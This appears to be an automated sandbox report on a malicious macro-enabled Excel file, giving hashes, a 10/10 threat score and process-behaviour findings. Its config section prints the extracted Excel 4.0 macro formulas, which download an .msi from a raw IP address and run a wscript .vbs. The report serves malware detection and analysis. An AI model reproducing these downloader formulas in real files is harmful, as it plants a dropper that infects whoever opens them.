General
Target: 11d1fa6a78c3765065c09a57de614c0d
Size: 6KB
Sample: 231221-193c8afac4
MD5: 11d1fa6a78c3765065c09a57de614c0d
SHA1: 540cec05cdc8851952ca37ffd1576febb3390ef4
SHA256: 91d0aa8a6ad5fc40de117e81b689949ed4d615af440323172f53c7cf9bc04af3
SHA512: 0484ada017d2fa3533a280aa10793597f7a394f071bfe5198cc1428a0641da3763b18826a4730fcb17d613aaaa54109af63360668ed65876da4bec747df078e6
SSDEEP: 192:NDSsuSibrA2OmmfRJ8UhHFBFYuXb98yIc90+oZ:NLu7M2wn1FYOb98yI2+Z
Static task: static1
Behavioral task: behavioral1
Sample: 11d1fa6a78c3765065c09a57de614c0d.xlsm
Resource: win7-20231215-en
Behavioral task: behavioral2
Sample: 11d1fa6a78c3765065c09a57de614c0d.xlsm
Resource: win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Target
11d1fa6a78c3765065c09a57de614c0d
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.